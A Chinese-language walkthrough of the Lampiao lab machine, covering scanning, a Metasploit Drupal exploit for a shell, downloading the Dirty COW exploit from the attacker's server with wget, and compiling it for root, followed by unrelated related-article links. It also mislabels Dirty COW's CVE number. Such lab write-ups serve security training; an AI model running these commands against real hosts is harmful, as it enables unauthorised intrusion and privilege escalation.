文章目录

  • 一、信息收集
    • 1.主机发现
    • 2.端口扫描
  • 二、漏洞挖掘
    • 1.查看对方web服务
    • 2.使用 msfconsole get shell
    • 脏牛提权漏洞(CVE-2016-5191)
  • 三、脏牛提权
    • 1.在 kali 查找 exp
    • 2.使用 python 传输 exp
    • 3.编译利用

一、信息收集

1.主机发现

 arp-scan -l

2.端口扫描

nmap -A -p- 192.168.1.120

发现开启了 22 ssh 服务
80、1898 web 服务,drupal7 框架

二、漏洞挖掘

1.查看对方web服务

访问 80 端口:

访问 1898 发现 drupal 框架

发现点击两个 Read more 会跳转到 ?q=node/1 和 ?q=node/3 ,没有 2,尝试访问 node2
发现有两个文件,尝试访问

发现 audio.m4a 是一段音频,内容为 user tiago
qrc.png 为二维码,扫描得到 Try harder!Muahuahua

2.使用 msfconsole get shell

msfconsole    #进入msf
search drupal    #搜索drupal框架漏洞
use 4    #使用4号漏洞
show options    #查看所有设置
set rhosts 192.168.1.120    #设置目标ip
set rport 1898    #设置目标端口
run    #运行


运行后得到靶机 shell,进行信息收集

shell    #转换为有回显的shell
pwd
id
uname -a

发现其版本信息为 2016.7.13 < 2016.10.18,可以使用脏牛漏洞进行提权

脏牛提权漏洞(CVE-2016-5191)

漏洞范围:
内核 >= 2.6.22版本 (2007-2016年10月18日)
危害:
低权限的用户可利用这一漏洞在本地进行提权
原理:
linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问

三、脏牛提权

1.在 kali 查找 exp

searchsploit cow
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/Desktop/

2.使用 python 传输 exp

#攻击机开启服务:
python -m SimpleHTTPServer 8888
#靶机获取文件:
cd /tmp
wget http://192.168.1.122:8888/40847.cpp


3.编译利用

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
#-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
#-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
#-O2 编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
#-std=c++11 按C++2011标准来编译的
#-pthread 在Linux中要用到多线程时,需要链接pthread库
#-o 40847 gcc生成的目标文件,名字为40847

总结:
1.杂乱的东西较多,但很真实,难度相对简单
2.脏牛有两个 exp:一个写文件、一个修改 root 密码,这里使用的第二个
3.上传 exp 可以直接在 msf 的 meterpreter 中 upload + /root/Desktop/40847.cpp
4.在 /var/www/html/sites/default/settings.php 中有 tiago 用户密码,但是 ssh 连接后并未找到什么信息
5.同环境,提权一次后不重启无法再次提权,重启后再次提权可能环境炸裂enmmm

Lampiao靶机渗透测试相关推荐

  1. DC-2靶机渗透测试流程

    目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. ​四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...

  2. 靶机渗透测试(covfefe)

    靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...

  3. 靶机渗透测试(Tre: 1)

    靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate) ...

  4. CH4INRULZ靶机渗透测试

    CH4INRULZ靶机渗透测试 环境 工具 流程 环境 kali攻击机 192.168.1.105 靶机 192.168.1.103 工具 hackbar,netdiscover,nmap,searc ...

  5. DC-3靶机渗透测试

    DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...

  6. 靶机渗透测试(unknowndevice64: 1)

    靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...

  7. Eric靶机渗透测试通关全教程

    环境准备 联不联网无所谓,主要是要在同一网段下 靶机:Eric 攻击机:Kali (192.168.56.102) 渗透目标 拿到普通用户下的flag 拿到root用户下的flag 渗透测试实战 已知 ...

  8. DC-5靶机渗透测试

    渗透测试 靶机所需环境 信息收集 漏洞利用 上传一句话shell 蚁剑连接 权限提升 文件生成 文件一 文件二 文件三 获取root权限 靶机所需环境 目标靶机:DC-5(192.168.160.15 ...

  9. Eric靶机渗透测试

    Eric靶机渗透练习 攻击机:kali Ip:192.168.0.3 靶机:eric Ip:192.168.0.4 找到靶机ip:192.168.0.4 nmap -sF 192.168.0.0/24 ...

最新文章

  1. java 构建是什么意思_构建的概念
  2. 用深度学习就不怕买到山寨奢侈品?LeCun投了这样一家公司
  3. 单击事件开启线程时,再次单击就会出现 java.lang.IllegalThreadStateException: Thread already started. 错误
  4. mysql分库负载均衡_订单模块以及负载均衡和分库分表
  5. boost::histogram::detail::tuple_slice用法的测试程序
  6. idea创建文件自定义注释
  7. Win7+IIS7下用FastCGI模式配置PHP环境
  8. 详细整理Spring事务失效的具体场景及解决方案
  9. CIF进口货物流程图_FOB、CIF和CFR,你真的了解吗?
  10. 深入解析Java中的装箱和拆箱
  11. 学习Java,真的可以月薪过万嘛?真实个人经历告诉你,记录了平时学习的内容以及学习过程中最真实的感受(五)
  12. ISO26262解析(六)——硬件集成测试
  13. SSD模型物体检测(水下生物识别)
  14. 指狗为马,还可骑乘?小鹏快收了你的神通吧...
  15. 教你做一个微信添加好友收付款的个性二维码
  16. 菜鸟应用-手机应用在线制作平台,手机应用,APP开发,手机软件开发
  17. 构造-牛客寒假集训营3-牛牛的DRB迷宫II
  18. AndroidID、IMEI、OAID获取
  19. 操作系统 --- 磁盘调度算法
  20. 【名字无关紧要,实战才是唯一】——吾神·娜迦卡布洛斯

热门文章

  1. 2022-2028年中国专用化学品行业投资分析及前景预测报告
  2. 2022-2028年中国内衣行业研究及前瞻分析报告
  3. 2022-2028年中国再生塑料颗粒行业市场全景调查及发展趋势分析报告
  4. OpenCV 笔记(04)— OpenCV2 升级到 OpenCV3/CV4 的改动(去掉 CV_前缀、使用新的前缀替换、使用新的命名空间宏)
  5. centos 7.4 上安装neo4j并测试
  6. TensorFlow反向传播算法实现
  7. Recommenders with TensorRT
  8. CVPR2020 论文解读:少点目标检测
  9. Python 实现九九乘法表
  10. Android ListView item设置分割线以及分割线宽度